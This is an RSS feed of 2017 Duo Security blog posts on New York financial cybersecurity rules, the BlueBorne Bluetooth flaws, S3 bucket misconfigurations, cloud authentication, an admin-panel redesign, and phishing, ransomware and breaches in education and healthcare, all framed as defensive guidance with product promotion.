<![CDATA[The Duo Blog]]> https://duo.com/ Duo's Trusted Access platform verifies the identity of your users with two-factor authentication and security health of their devices before they connect to the apps you want them to access. Wed, 20 Sep 2017 10:18:00 -0400 en-us info@duosecurity.com (Amy Vazquez) Copyright 2017 3600 <![CDATA[New York Cybersecurity Regulations in Effect for Financial Services]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/new-york-cybersecurity-regulations-in-effect-for-financial-services https://duo.com/blog/new-york-cybersecurity-regulations-in-effect-for-financial-services Industry News Wed, 20 Sep 2017 10:18:00 -0400

In January, I wrote about the proposed cybersecurity regulations for New York-based banks, insurance companies and other financial services.

Now those regulations are in effect as of August 28, 2017, and companies must comply with the requirements put in place by the New York Department of Financial Services (DFS).

Additional rules will be phased into effect between 2018 and 2019, according to an article by the law firm Cadwalader, Wickersham & Taft.

Mandatory NY Cybersecurity Provisions

Mandatory provisions include:

  • Implementation of a risk-based cybersecurity program - It must have written policies and procedures and an incident response plan.
  • Designation of a Chief Information Security Officer (CISO) - This CISO must be qualified and retain security staff that can stay up-to-date with the latest threats and solutions.
  • Periodic user access assessments - By conducting a periodic review of who has access to their confidential data and networks, organizations can put limitations in place to secure that access.
  • Following the breach incident process - Organizations must report any security events to the DFS within 72 hours - including unsuccessful attacks that may raise concerns.

Upcoming Dates

If you think you might qualify for a limited exemption of the rules (less than 10 employees or $5 million in gross annual revenue, etc.), you have to apply for a Notice of Exemption by Sept. 27, 2017.

The next date to watch out for is February 15, 2018, when all DFS-regulated organizations must submit their first certification of compliance under 23 NYCRR 500.17(b).

Get the full list of key dates under NY’s Cybersecurity Regulation.

Cybersecurity Program Requirements

The regulations require many different components of a cybersecurity program - below is just a summary of each aspect:

  • Penetration Testing and Vulnerability Assessments - This requires monitoring and testing, annual penetration testing, and bi-annual vulnerability assessments.
  • Audit Trail - Must be designed to reconstruct financial transactions to support normal operations (maintain records for at least five years); audit trails to detect security events (maintain records for at least three years)
  • Access Privileges - Limit user access privileges to information systems with confidential information, and conduct a periodic review of those privileges
  • Application Security - Must include written procedures, guidelines and standards to ensure secure development for any in-house applications developed for use by the organization; these will be managed by the CISO
  • Risk Assessment - The DFS outlines the nee for periodic risk assessments for revisions to controls, policies and procedures for evaluating and identifying threats, risk mitigation plans and more.
  • Cybersecurity Personnel and Intelligence - Have qualified cybersecurity professionals (could be third party)that oversee security; update and train them on risks; ensure they’re maintain a current knowledge of changing threats and solutions, etc.
  • Third-Party Service Provider Security Policy - Must have policies and procedures to ensure third party security, including risk assessments, minimum security standards, periodic evaluation of third party risk, etc.
  • Multi-Factor Authentication - Use effective controls, including multi-factor authentication (MFA) or risk-based authentication. MFA must be used for any user accessing internal networks from an external network.
  • Limitations on Data Retention - Include policies and procedures on the secure disposal of confidential information when it no longer is necessary to retain for business.
  • Training and Monitoring - Implement risk-based policies, procedures and controls to monitor user activity and access to data; provide regular security awareness training for all personnel.
  • Encryption of Nonpublic Information - Implement controls, including encryption, to protect data stored or in transit over external networks. There is an option to use compensating controls in exchange; they must be reviewed and approved by the CISO.
  • Incident Response Plan - Establish a written incident response plan designed to respond promptly to and recover from any event that affects the confidentiality, integrity or availability of the organization’s systems or business operations.

To see the full text and specifics of the regulations, check out the Cybersecurity Requirements for Financial Services Companies (PDF).

<![CDATA[Now Available: Healthcare Information Security Guide]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/now-available-healthcare-information-security-guide https://duo.com/blog/now-available-healthcare-information-security-guide Industry News Mon, 18 Sep 2017 09:00:00 -0400

Below is an excerpt from the introduction of a new guide released today by Duo, Healthcare Information Security - a collection of relevant articles on the latest information security themes in the healthcare industry:

Protecting access to electronic patient healthcare data (ePHI) while increasing availability can present a significant challenge for healthcare security teams.

Enabling mobility and the use of remote services, such as telemedicine (the remote diagnosis and treatment of patients), can greatly improve the accessibility of patient care, expanding services to a wider population.

But that can require integrated, interoperable systems that can increase complexity and security risks that may pose a threat to the privacy and security of patient data.

Healthcare Information Security Guide from Duo

Security challenges for healthcare organizations can include:

  • Struggle to balance strong user authentication security with usability
  • Lacking effective visibility and control over the entire environment
  • Increased complexity introduced by unmanaged mobile devices such as employee-owned smartphones and tablets

Gaining an understanding of evolving themes and issues in healthcare information security today can help inform and shape your security team strategy.

In this collection of articles, you’ll learn about:

  • Key healthcare security recommendations from the newly formed HHS Cybersecurity Task Force on legacy systems, patching, strong authentication and more
  • FBI issuance of a security warning to the healthcare industry about remote File Transfer Protocol (FTP) attacks
  • The top, most likely attack vectors of interconnected EHR (Electronic Healthcare Record) systems
  • An overview of the OCR’s (Office for Civil Rights) guide to preventing ransomware, including basic measures to take to secure remote access to systems with ePHI
  • How to protect against potential ransomware attacks on hospital systems by gaining endpoint visibility
  • How to secure against the threat of stolen remote desktop protocol (RDP) credentials
  • The latest goals for Meaningful Use, including facilitating multi-provider care and secure sharing of patient data
  • The importance of healthcare network segmentation to enable monitoring of data
  • Information security basics that can help reduce the risk of introducing vulnerabilities, ransomware and threats to your patient data environments

Balancing the security and privacy of patient data with enabling mobility and productivity in healthcare is key.

Healthcare Information Security Guide Spread

Download the Healthcare Information Security Guide today to learn more about how to balance security while enabling user productivity, and improving patient care. And visit Duo for Healthcare to see how Duo can help secure your organization.

Download Now

<![CDATA[An Analysis of BlueBorne: Bluetooth Security Risks]]> mloveless@duosecurity.com(Mark Loveless) https://duo.com/blog/an-analysis-of-blueborne-bluetooth-security-risks https://duo.com/blog/an-analysis-of-blueborne-bluetooth-security-risks Duo Labs Fri, 15 Sep 2017 08:00:00 -0400

On September 12, 2017, a series of Bluetooth vulnerabilities collectively referred to as BlueBorne was made public by Armis Labs. Numerous major platforms were impacted and have released patches as a result, making this a major event for businesses and regular consumers alike.

Bluetooth is a wireless communications technology comprised of dozens of protocols working in parallel and in layers, and is commonly used for short-range communication between various devices. It is often associated with the Internet of Things and those devices’ interactions with more conventional technology such as computers and smartphones.

On some platforms, part of the subsystems contain vulnerabilities that range from information leakage to remote code execution. Not all platforms are vulnerable to all of the vulnerabilities, although some devices are vulnerable to more than one. The overall collection of this research known as BlueBorne covers these loosely-related vulnerabilities, with the idea that it stresses the underlying issues of vulnerabilities in complex codebases being rapidly adopted by both existing and new technologically-dependent industries.

In other words, a number of serious Bluetooth bugs were found, and the research suggests that more may exist in similar protocols in Bluetooth implementations in any number of other Bluetooth-enabled devices. It is these theoretical vulnerabilities out there that have been driving the headlines, and why we wanted to address some of the concerns, as the press is making it seem like the entirety of technology is affected (it is not).

Analysis of BlueBorne Vulnerabilities

The BlueBorne vulnerabilities themselves can be broken down into groups based upon platform. There were vulnerabilities found in the Linux Bluetooth code; the Windows platform starting with Windows Vista up to and including current Microsoft offerings; older versions of Apple’s iOS; and Android versions, including the most recent.

The Linux platform contained two flaws - an information leak and a remote code execution vulnerability. The information leak is in the SDP protocol, and allows for small pieces of adjacent memory to be read by an attacker remotely. The remote code execution vulnerability is in the Bluez library that is included in the kernel code, making for a serious vulnerability. Not only are the major flavors of Linux impacted, but devices running code based upon these libraries will also be impacted. For example, a number of Samsung devices (e.g. smart watches, TVs, refrigerators) use some of the same libraries.

The Windows platform contains a flaw allowing for IP communication to be intercepted and altered via a man-in-the-middle (MITM) attack with the Bluetooth protocol stack being the attack vector.

The Apple iOS vulnerability was a remote code execution vulnerability, however, this vulnerability is not present in current versions of iOS. If your version of iOS is 10.3.3 or greater, you are not vulnerable to this issue.

The Android vulnerabilities consist of two remote code execution vulnerabilities, an information leak, and a man-in-the-middle attack similar to the Windows flaw. These can be used in conjunction with each other to “strengthen” the attack against vulnerable Android systems.

Likelihood of Attack

This area of consideration involves deciding on the level of risk your device may be at, and taking into consideration the likelihood of a successful attack against the device.

Bluetooth Sniffing is Hard

The BlueBorne vulnerabilities were researched in a lab environment. Duo Labs has done similar research involving Bluetooth, and we can definitively report to you that it can be quite challenging and complex. Working in a controlled environment, things may just barely work at times and real-world application could be a serious challenge.

Think of it this way, have you ever had an instance where you have a dead spot in your house where something wireless did not work? For example, you can’t use the app on your phone to turn on the lights in the kitchen if you sit in the brown chair by the window. If you sit on the couch it works, but not the brown chair. The real world is filled with these little environmental areas that you don’t encounter in a lab.

Just about every presentation at a security conference involving Bluetooth includes a slide that says or mentions that Bluetooth sniffing is hard. It can be hard enough in a lab; in a real-world attack scenario, the attacker not only faces any number of brown chairs, but they have to find the exact spot on the couch. The Bluetooth signal has to be sniffed - already a challenge - and then an attack has to be launched against a potential moving target. Not easy.

Wireless Attacks Require Proximity

For any wireless attack to work, including attacks involving Bluetooth, the attacker has to be within physical proximity of the victim. This is not the classic scenario where the attacker is sitting in the middle of suburbia in a basement; for this attack to work, the attacker has to leave that basement and go physically find a victim.

As a result, it makes sense that the attacker would go where the most possible victims might be, such as a coffee shop, food court, busy conference floor, or popular sporting event - you pick. Even then, the effective range of Bluetooth narrows it down to a few dozen feet in most cases.

Non-Trivial Attack

The BlueBorne attacks are, as of this writing, non-trivial. The technical details that surround the flaws require more knowledge than your average script kiddie possesses to pull off - these vulnerabilities were released without exploit code.

An attack could make use of the included Bluetooth hardware in an average laptop, but would greatly benefit from the added enhancement of extra hardware that is more powerful, such as a USB Bluetooth device with a large antenna.

The attacks against platforms or devices that were not included in the BlueBorne release are speculative. They will require an attacker to perform non-trivial research to find them, and are currently non-existent and theoretical. It doesn’t mean they aren’t there - any security person worth their salt will tell you they are probably there - but the threat from them is not immediate as the actual threats that have been found and reported.

Timing and The Odds

Timing is another factor. You, the potential victim, have to show up at the exact physical place that the attacker is at. At the same time. An attacker with a Liam Neeson special set of skills. And extra hardware. Who knows where the couch is, and avoids the brown chair. And you have to be there long enough for Liam to pull this off, assuming another victim doesn’t already have his attention.

Okay, we’ve had some fun exploring how likely the attack is - it is serious, but keep in mind the drive in the car to the coffee shop was much more dangerous and more likely to impact you than our friend Liam.

Mitigation of BlueBorne-Related Risks

There are two main areas of mitigation involving the BlueBorne vulnerabilities.

First and foremost, patch as soon as you are able to do so. Google has released patches for Android systems, and all partners that support regular patching are already releasing their fixes for their devices. Windows has already released a patch, and the iOS platform is already patched if you are on a current and supported version of iOS. Linux is in the process of releasing patches on their various platforms.

Your second line of defense, if you are unable to patch immediately, is to disable Bluetooth on your devices. This simple step prevents all of the vulnerabilities. If you are out and about with your unpatched phone, disable Bluetooth when you are in areas where people might congregate or other areas where you might be at risk, or simply leave it off.


While the vulnerabilities are serious, it is easy to mitigate and there are patches available from the major vendors. It is true that other vulnerabilities might exist in other products that have yet to be discovered, but that holds true with pretty much all technology.

Keep your devices patched up, disable Bluetooth if you don’t need it, and most importantly, do not feel overwhelmed with the flashy headlines that are screaming about everything being affected.

<![CDATA[Redesigning the Duo Admin Panel]]> rcardneau@duo.com(Ryan Williamson-Cardneau) https://duo.com/blog/redesigning-the-duo-admin-panel https://duo.com/blog/redesigning-the-duo-admin-panel Design Thu, 14 Sep 2017 08:00:00 -0400

In 2016, Duo.com received an updated look and feel from our in-house Creative team. They pushed us into a new age of design for Duo, ushering in cleaner type aesthetics, bolder graphics, and a focus on putting our messaging and content first.

While we’ve added new features and new edition names to the Admin Panel, the look and feel has lagged behind our public website. During this time, Duo.com refined its visual language, a visual language we are expanding on to build a consistent look and feel across our product.

Before: Duo.com, Before

After: Duo.com, After

We’re updating the look and feel of the Admin Panel to create consistency across all touchpoints with Duo because it builds trust. It matters in the language that you read, but it also extends through to the visual language.

It can be visually jarring for a new user to go to the Duo.com site, read up on Duo, decide that they would like to sign up for a trial, land in the Admin Panel and realize that it looks nothing like Duo.com. There’s also a visual disconnect for existing customers that may receive an email about a new feature, then go to the Admin panel to check it out. That email you received will likely have the new Duo.com look and feel, while the Admin Panel does not.

New Look on Duo.com: New Look on Duo.com

Old Look in the Duo Admin Panel Old Admin Panel

This sort of visual shift creates a mental break in workflow for the user as they reorient themselves to their new surroundings.

You could argue that this will happen regardless because the Duo.com site and the Admin Panel will always look different when it comes to where things are placed and just how much content or visual elements are on the page. And that would be a true statement. But we can mitigate this by creating a strong visual connection or language between these two entities so that the transition feels natural and the amount of time to reorient is minimal.

Visual consistency is more than just looking the same; it’s how we at Duo show that we care about how you experience our product, interacting with our marketing materials, or kicking back and watching one of our fun videos. It creates a seamless experience that proves that we are serious about being the most loved brand in security.

Let’s take a look at how we achieved that consistency without changing any of the functionality you know you and love. We intend to roll this out with our October new features release - sit tight and enjoy the nerdy design thoughts.


We examined the colors currently being used on Duo.com to determine what additional visual consistency we could build on from there. Even with this foundation, there are countless choices and considerations that go into choosing a color palette.

One needs to consider where the colors are going to be used, how they’re being used, the frequency of which the user sees the color, any previous biases that may come with that color, just to name a few. With that in mind, we set out to revamp and expand our color palette in the Admin Panel. First of all by looking at the colors we were using for our text and our button/link UI (user interface) elements.

Links and Buttons

Links and buttons are the most commonly used UI elements, which means the right color choice is critical. You want the colors to be uniform enough that they feel like a set of the UI while not being too overpowering, nor command too much attention away from the content on the page as a whole — the meat of what you want the user to consume or interact with. On top of all of that, you want to ensure that the colors you use have enough contrast so that all intended audiences can actually see them. That’s a tall order.

Duo Base Colors

We decided on a calming blue as the default color for links, and a darker-colored text link as a backup for very specific circumstances. The blue links create contrast when placed inline with body copy to alert the user to interactive elements.

That blue is carried over into the buttons to unify the buttons and links together, building a strong pattern that when you see this blue, you can bet your bottom dollar that it’s something you can interact with. At the same time, we’re removing additional colors from our secondary buttons and our destructive buttons to help create a visual balance between the secondary navigation areas and the page content.

Graphs and a Secondary Color Palette

The second and most difficult renovation to the color palette would be the creation of a secondary color palette reserved for use with graphs. The challenge was striking a balance between a large set of colors that fit into the core color palette, while creating a cohesive, well-balanced set of colors that can be mixed and matched together, but not so vibrant or dominant that they detract from the data on page. Graphs are a visual way of conveying a set of data and should not overpower the labels or additional text elements that help display that data in a text format.

This was achieved by identifying colors already in use for our color palette (such as red and green). This also includes colors that hold previously established biases through common association or existing uses in our Admin Panel — these include colors such as yellow and orange, which are commonly associated with warning or error messages, as well as a particular shade of blue that we currently use to display info messages.

Duo Graph Colors

After constraints are defined, we created a cohesive palette that can be reserved only for use in infographics - cooler colors tinted white to make them less visually dominant on screen.

UI Updates

Admin Panel Dashboard

The dashboard is the landing page of the Duo Admin Panel, so it’s a great place to establish UI patterns with the user. Here, we have to strike a visual balance with the general UI elements and the data overview for our administrators. We also had to take into account additional layout changes that may come to this page in the future — so it’s not just designing for the moment, but planning for a continually evolving system.

New Duo Admin Panel Dashboard

We started by eliminating background colors that artificially broke up sections of content into blocks. These boxes added unnecessary visual clutter and make it difficult for users to quickly scan the page, so we removed them.


I’m sure some people have been wishing for a night mode of the Duo Admin Panel - now customers receive it by default! This change was made primarily for two reasons:

  1. The navigation should both help to anchor the application to the screen, but at the same time, not hinder the readability of the content. (If you haven’t noticed, giving prominence to the content on the page is going to be a reoccurring theme.)
  2. Users should be able to quickly glance at the navigation and see where they are, and if the page is a child page inside of a section, or has additional child pages of its own

Duo Admin Navigation

Beyond the main navigation, we took steps toward better defining what the secondary level navigation looks like. We needed a solution that could accommodate a range of button or link types while signifying to the user that they’re actionable.

Duo Admin Secondary Nav

To this end, we opted to change the link color to grey, while only allowing the blue primary action button to persist. What this does is lower the visual footprint of the secondary navigation, allowing for flexibility when used inline with content on the page or at a top level, acting as global navigation for each page/section.

Duo Admin Secondary Nav 2

Policy Editor/Creator Modal

We decided to give considerable attention to this specific UI element. Before, we were using inconsistent visual patterns to indicate which attributes on a policy were enabled.

Duo Admin Policies

To help support a distinct and clear visual indicator of an active policy, we chose to remove the policy icons. Icons are meant to serve as shorthand for meaning. Through user testing, we found that this was not the case at all with our policy icons.

Instead, they became more visual clutter than visual cue, so we switched them to something more useful. Making them checkmarks clearly reinforces that this particular attribute has been enabled, and the addition of the “enabled” text helps to reinforce the checkmark, as well as making it screen reader accessible. Conversely, when a policy is disabled, this checkmark simply is hidden.

The new checkmark icon and pattern is reused inside the policy modal’s left-hand navigation, simply showing whether a policy has been added and enabled or not.

The last thing we focused on was where the policy modal appears on screen. Right now, it simply centers itself on screen. This is pretty common for modals, but it wasn’t following other patterns in our admin panel.

So we took cues from how other content is visually aligned on the page and anchored the modal to the left navigation.

Anchoring it to the left navigation keeps it from floating above the interface and gives it a concrete position to live. This allows us to mimic the layout of page beneath the modal. Creating a familiarity with where the eye is supposed to go inside of the modal.

Pop-Up Notifications

Now, the policy modal is not the only modal in our interface. We use pop-up notification modals for a number of activities, including confirming actions. But these modals were using their own library of icons, creating visual clutter. As a result, we’re striking the iconography that has typically been used to indicate if you were just getting an informative pop up or a warning.

Instead, we will represent destructive actions by highlighting the text in red. In the instance of a destructive modal, there will be header text that clearly defines what you are removing and highlights it by displaying it in red. Additional reinforcing text will be provided underneath to describe the action that you are about to perform. In the case of an informative pop-up, we simply do not provide the header text in red.

Red Header Text

That said, we are adding a familiar global icon to modals: the close button. Right now, we don’t provide a close button to users, which doesn’t follow best practices.

Finally, we swapped the order in which the buttons in the modal appear. Right now, the call-to-action button is typically on the right with both buttons centered in the middle of the modal. This is counterintuitive to how users typically interact with pop ups, so we moved the buttons over to align with the left edge of the copy and made the call-to-action button the first button displayed with the secondary or cancel button being displayed after it.

Duo Admin Modal

Settings Pages

The design thinking applied to the settings page was really a solution for how we present all longform layouts in the Admin Panel. Previously in the Admin Panel, we followed best practices for keeping labels aligned next to their respective input fields in order to build a stronger association between categories and open fields. However, we’re not breaking away from best practices in our modification of this long form design, but rather optimizing it for better scannability when presenting a large number of fields to the user.

Duo Admin Settings

Labels are still being kept inline with their respective fields but, instead of being right aligned to the input field, they’re left aligned. Why? It creates a hard left visual edge along the labels which allows the user’s eye to quickly follow down the list and scan each label. This means that users have an easier time finding the one attribute they need to update. Since that means the text moves slightly farther away from the input field, we added subtle borders to better break up the content into groups. This helps define some structure to the page and also helps users find a particular setting to update.


This may come across to readers as a drastic shift from what they’re used to seeing in the Duo Admin Panel, but we wanted to reassure you that every change we made came with the user's best interests in mind and a careful amount of consideration on our part. We hope you enjoy the update and look forward to future improvements we plan on making. We also hope that your experience interacting with all things Duo, including our website, marketing materials, videos, Admin Panel and the Duo Prompt are as seamless and enjoyable as possible.

<![CDATA[Securing Access to Data Stored in Amazon S3 Buckets]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/securing-access-to-data-stored-in-amazon-s3-buckets https://duo.com/blog/securing-access-to-data-stored-in-amazon-s3-buckets Industry News Tue, 12 Sep 2017 11:00:00 -0400

While ransomware appears to remain the topic du jour in the media, there’s another problem that isn’t quite as flashy but still irrevocably damaging - misconfigured access to Amazon S3 buckets.

Basically, that refers to massive amounts of customer/and or personal data, often sensitive, left unprotected in virtual cloud storage.

What is Amazon S3?

Amazon Simple Storage Service (S3) is a virtual web storage service offered through Amazon Web Services (AWS) that allows for storing and retrieving of data from any source, including websites, mobile apps, data from interconnected devices and sensors, etc.

It can be used to collect, analyze, visualize and otherwise process very large amounts of data (i.e., exabytes - one quintillion bytes). It can be used for backup and recovery, data archiving, big data analytics, cloud storage, disaster recovery and many other use cases.

More specifically, S3 buckets refer to the logical unit of storage used in AWS - buckets are used to store objects, consisting of data.

Exposing Cloud Data to the Internet

There have been countless examples of misconfigured access to these buckets containing massive amounts of sensitive data, which is significant since S3 buckets are, by default, configured for private access.

Just in the past few months alone, there have been at least half a dozen significant incidents involving the exposure of millions of personal records:

  • Twenty-five terabytes of data stored in a data analytic provider’s AWS cloud account were found unprotected, exposing information on nearly 200 million potential voters
  • A private military contractor and third-party recruiting vendor leaked job applicant information of thousands of U.S. military veterans, as well as Iraquis and Afghanis working alongside the military
  • A major mobile carrier exposed 6 million customer service call records found on a publicly accessible S3 repository, administered by a third-party vendor
  • An entertainment company left three million users’ personal information on an unsecured server, in plain text
  • A worldwide publishing and financial firm exposed 2-4 million customer records on some semi-public S3 buckets
  • A large cable television provider left an unsecured AWS server containing millions of app users’ data exposed without a password

This pattern may indicate a few distinct issues in the network security of companies across all sizes and industries - either the lack of awareness of the real dangers of misconfigured access to data stored in the cloud, or potentially the lack of insight into third-party vendors’ security practices.

Misconfigured Access to Amazon S3 Buckets

In July, a blog post by Detectify identified a few different ways they could break into websites and data due to weak configurations of S3 buckets.

Due to a common misconfiguration of S3’s Access Control Lists (ACLs), attackers can gain access to S3’s list and read files by using the S3 bucket name information and an AWS Command Line tool to talk to Amazon’s API.

Network administrators often grant too much user permission to S3 buckets, allowing anyone with AWS credentials to access sensitive data, according to Threatpost.

How to Properly Secure Access to Data Stored in the Cloud

For Amazon S3 buckets, all resources are private by default. Only the resource owner (the AWS account that creates the resource) can access it.

By setting bucket and object access permissions, a resource owner can specify which users can access buckets and objects, as well as the type of access they can have (i.e., read-only or read and write).

AWS’s documentation provides more information on managing access and setting access permissions to secure Amazon S3:

As noted in a Medium article, How to Secure An Amazon S3 Bucket by Mark Nunnikhoven, VP of Cloud Research at Trend Micro, “there are multiple avenues to grant permissions” and thus “multiple areas to make simple mistakes that might cause a leak…” He recommends never allowing public access to an S3 bucket, and instead providing granular access through IAM roles.

MFA & Policies for Stronger AWS Access Security

To add an extra layer of security to your AWS accounts and protect access to your AWS resources, Amazon recommends using multi-factor authentication (MFA). Learn more about Using Multi-Factor Authentication (MFA) in AWS.

They caution that enabling MFA for root users only affects the root user credentials - other IAM (Identity and Access Management) users are distinct users with their own credentials and therefore their own MFA configurations.

Moving Beyond the Perimeter In addition to adding multi-factor authentication, checking the security health of the device accessing your environment is also important. Many known vulnerabilities leverage weaknesses found in older versions of operating systems, browsers, plugins, and other software to compromise the device and gain access to your applications and data.

Device access policies can determine whether or not your users’ devices meet your minimum security standards, and allow you to block or notify users to update before being granted access.

Download part 1 and part 2 in our Moving Beyond the Perimeter white paper series to learn more about the theory and implementation behind a new approach to enterprise architecture that addresses the latest risks beyond the perimeter.

<![CDATA[Cloud Auth - Are You Doing Enough?]]> dcopley@duo.com(Doug Copley) https://duo.com/blog/cloud-auth-are-you-doing-enough https://duo.com/blog/cloud-auth-are-you-doing-enough Industry News Fri, 08 Sep 2017 08:00:00 -0400

There’s no hiding that business in today’s day and age is done differently than when I was first entering the job market. Ordering servers, waiting for them to come in, configuring storage, network, finding rack space in the data center - all took time and so the time to value was significant. Enter today where anyone can “spin up” a platform in Amazon, Google or Microsoft and have it up and running in less than 30 minutes. Certainly the cloud has decreased the time to value significantly.

But what about the access to that application? It used to be that administrators spent time configuring the server, securing the server and application, and, only when they felt all the necessary controls were in place, did they begin allowing users to authenticate to and use the application for its intended purpose.

How do those activities translate to today? Certainly there are similar steps that should be taken to set up controls such as logging, network monitoring, maybe user behavior monitoring, as well as securing the virtual server and attaching access control lists (ACL) to resources that need to be protected. Sounds like all the same steps - and certainly with technologies such as Docker containers and the like, these processes can also be significantly accelerated to bring that time to value even shorter.

But all you have to do is catch some recent headlines to know that not all companies do this well. Just this week, the résumés of over 9,000 candidates seeking government positions with Top Secret clearance were exposed because the company responsible for hosting those résumés did not properly secure access to their cloud data storage.

So when it comes to securing your cloud applications and data, how much protection is necessary? Do I just set ACLs and call it done? That should help keep bad people and bad things out, right? Do I need to track access to the applications? Do I need to put data loss prevention (DLP) in place? Do I care what devices users are using to access applications? Do I care whether the access is coming from a corporate-owned device or a personal one? These are all questions that should be answered before the server or application is ever made available.

The answer? As with most tough questions, it depends. It depends on how sensitive the application or data is that you’re trying to protect. If I’m protecting the HR data of all the employees in the company, I probably want that protected really well. If it’s information on the products a company sells, that information should be available to the public so I may only put minimal protection there. So as a CISO or CIO, I want controls that I can adapt to the level of sensitivity of the application. I don’t want to waste precious dollars and hours putting strict controls across everything when it’s not necessary. That’s a huge waste of resources.

So what about those devices? Should I care what device an end user is accessing the application from? The answer is a resounding “Yes.” Without validating the hygiene of the device, malware could be inviting itself into the application or hosting environment. Is that user’s PC vulnerable to known exploits? Is it using a Flash plugin that’s three months out of date? Is that mobile device accessing your Epic EHR jailbroken? If so, you can’t put any degree of confidence in the security posture of the device. So it’s necessary to check the hygiene of the devices that are being used to access your applications and enforce a minimum standard.

Maybe I’m front-ending the application with a virtual host such as Citrix or VMWare - do I care what device they’re using then? Although it’s true that some of these technologies can “abstract” the device from the application access, doesn’t it still make sense to require stronger authentication controls for your most critical applications? It certainly makes sense to use stronger user and device authentication for critical applications such as your HR system or medical record system, especially for remote access from home or another facility.

The good news is that technology today has made this level of authentication of users and devices simple. It’s now possible to evaluate devices without the use of agents and match that with strong authentication of the user to ensure you’re providing “trusted access” to your most sensitive applications. And the user experience can be painless and require no additional equipment or fobs to carry around.

So how much cloud authentication is enough? I’ve been a strong advocate of multi-factor authentication for years, but that’s not enough when dealing with BYOD, cloud applications or even critical applications hosted in your data center but being accessed remotely. For those, you should be using strong authentication methods that verify both the user and the device.

<![CDATA[Universities Targeted by Increasing Phishing & Ransomware Attacks]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/universities-targeted-by-increasing-phishing-and-ransomware-attacks https://duo.com/blog/universities-targeted-by-increasing-phishing-and-ransomware-attacks Industry News Wed, 06 Sep 2017 08:00:00 -0400

Malicious hacking attacks against U.K. universities have doubled over the past year, from 2016 to 2017, according to an analysis of freedom of information request data by The Times.

More than 1,152 breaches of U.K. university networks were reported last year. Attackers are targeting intellectual property, specifically, confidential information related to advanced developments in medicine, engineering and missile research, according to Computer Weekly.

This information is highly sought after by nation states; plus, this type of valuable data can be sold online to the highest bidder, as the BBC reported.

One of the reasons why the higher education sector is an easy target is due to resourcing and focus - universities may put more emphasis on academic research, rather than network protection.

While financial services companies are often targeted, they also often have larger IT and security budgets to protect business-critical financial information.

Ransomware Delivered Via Phishing

How are attackers getting access to data? According to the BBC, they’re employing phishing, denial of service and ransomware attacks.

In August, Proofpoint researchers found a new, custom-developed ransomware variant targeting the healthcare and education industries in the U.S. and the U.K.

These narrow, selective phishing campaigns were sent to both individuals and distribution list groups, and are customized to a specific set of users. The ransomware, named Defray by researchers, is spread via a Microsoft Word document attached to email messages.

But this ransomware doesn’t just encrypt data, it can also disable startup recovery and delete volume shadow copies. It also monitors and kills any programs running using a GUI on Windows 7.

Best Practices to Protect Against Phishing and Ransomware

The US-CERT (Computer Emergency Readiness Team) has provided some best practices to protect against phishing and ransomware. Here’s a summary of a few:

  • Frequently back up system files; verify backups regularly. Store backups on a separate device that can’t be accessed from the network.
  • Don’t click on links and open attachments in suspicious-looking emails; forward them to your IT or security team.
  • Never give out personal information or information about your organization’s networks or structure. Verify the requestor’s identity directly with their company
  • Keep your applications, operating system and other software patched with the latest updates to protect against exploits of known vulnerabilities.

Mitigate the risk of out-of-date devices with an endpoint and access security solution that gives you visibility and control over unmanaged, personal employee devices. And, reduce the impact of a phishing attempt that steals passwords by protecting your users’ account logins (and access to data) with two-factor authentication (2FA).

Learn more about specific types of remote access threats that target users, devices and remote access services, and how to mitigate them in The Essential Guide to Securing Remote Access.

<![CDATA[The State of the Breach in Healthcare: A Look at 2017 So Far]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/the-state-of-the-breach-in-healthcare-a-look-at-2017-so-far https://duo.com/blog/the-state-of-the-breach-in-healthcare-a-look-at-2017-so-far Industry News Fri, 01 Sep 2017 08:00:00 -0400

As of last week, the Identity Theft Resource Center reported that in 2017 alone, there have been 238 total reported medical/healthcare organization breaches, accounting for 25% of total breaches across all industries.

Here are some more statistics related to why those breaches happened, as well as certain areas to focus on in order to stay secure.

Top 10 Healthcare Breaches of 2017

When categorized by number of records breached, 90% of the top 10 healthcare breaches of the year were due to a “hacking/IT incident.” Eight of the breaches involved hacking of network servers, resulting in 3.6 million affected individual patient records.

From the same dataset, more records were stolen as a result of hacking than all other breach causes (which include physical theft, data disclosure, loss, etc.) combined, as an analysis by Bitglass revealed.

These breaches are listed on the U.S. Dept. of Health and Human Services’ Office for Civil Rights’ Breach Portal as part of the Health Information Technology for Economic and Clinical Health (HITECH) compliance stipulation that requires the agency to publicly list breaches affecting 500 individuals or more.

Healthcare Ranks Low in Security Performance

Based on SecurityScorecard’s 2017 U.S. State and Federal Government Cybersecurity Report, a ranking of the different industries according to “security performance” found the healthcare industry ranking sixth lowest, in the bottom performer’s group.

When it comes to network security, web application security, patching cadence, social engineering and nearly every other category, healthcare was ranked in the bottom performers group.

Leaked Credentials

The report also took a closer look at all sensitive information exposed as part of a data breach or information leak/dump, mapping the information back to the companies that owned the data or associated email accounts connected to the information.

Once again, healthcare ranked in the bottom performers group for the leaked credentials category. Low performance in this category indicates that employees may be potentially using corporate emails for non-work purposes, and passwords might be reused.

Protecting Against Known Vulnerabilities

Many malware attacks are successful because they exploit weaknesses found in older, unpatched versions of software. So, one of the best ways to ensure protection against these attacks is to patch and update your endpoints on a timely basis.

During our data collection and analysis for The Duo 2017 Trusted Access Report, we found that 76% of healthcare endpoints are running Windows 7, an older version of the Microsoft operating system. Another 3% (compared to 1% overall average) are running XP, an operating system that is no longer updated with new security patches by Microsoft.

In general, we found that across browsers, plugins and operating systems, healthcare is less up to date compared to the overall average of all other industries. That could mean that healthcare may be more susceptible to exploits and malware infection.

Endpoint security solutions can give you visibility into the security health of managed and unmanaged devices, giving you controls to keep risky devices out or prompting your users to update.

That Whole Ransomware Thing

The Solutionary Security Engineering Research Team (SERT) released a report last year that found that healthcare was the most targeted industry by ransomware, accounting for 88% of ransomware detections by the SERT team.

This is no big surprise, especially with the widespread and high-profile infections seen by the wormlike WannaCry ransomware in May, and the destructive NotPetya malware in June. While not the sole infection vector, WannaCry did use a known vulnerability, ETERNALBLUE, to infect Windows computers, install malware and spread itself to other connected machines.

And to protect against a successful exploitation of that vulnerability, you’ll need to patch your Windows machines by applying the MS17-010 update.

Learn more about Duo for Healthcare and Duo for Epic.

